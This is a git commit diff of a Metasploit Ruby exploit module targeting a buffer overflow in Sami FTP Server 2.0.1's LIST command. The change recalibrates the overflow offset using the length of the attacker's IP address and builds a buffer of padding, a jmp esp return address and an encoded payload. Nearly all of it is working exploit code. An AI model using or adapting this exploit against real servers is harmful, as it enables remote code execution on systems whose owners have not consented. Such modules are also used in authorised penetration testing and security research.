Uses IP address length in offset calculation

unstable
dougsko 2013-03-18 16:18:04 -03:00
parent 3d92d6e977
commit fb90a1b497
1 changed files with 10 additions and 4 deletions


@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow', 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
'Description' => %q{ 'Description' => %q{
A buffer overflow is triggered when a long LIST A buffer overflow is triggered when a long LIST
command is sent to the server and the user views the Log tab. command is sent to the server while the user is viewing the Logs tab.
}, },
'Platform' => 'win', 'Platform' => 'win',
'Author' => 'Author' =>
@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote
'Windows Universal', 'Windows Universal',
{ {
'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
'Offset' => 219, 'Offset' => 225,
}, },
], ],
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 27 2013')) 'DisclosureDate' => 'Feb 27 2013'))
register_options(
[
OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
], self.class)
end end
def exploit def exploit
connect_login connect_login
sleep 1
buf = rand_text(target['Offset'], payload_badchars)
ip_length = datastore['IPADDR'].length - 3
buf = rand_text_alphanumeric(target['Offset'] - ip_length)
buf << [ target['Ret'] ].pack('V') buf << [ target['Ret'] ].pack('V')
buf << payload.encoded buf << payload.encoded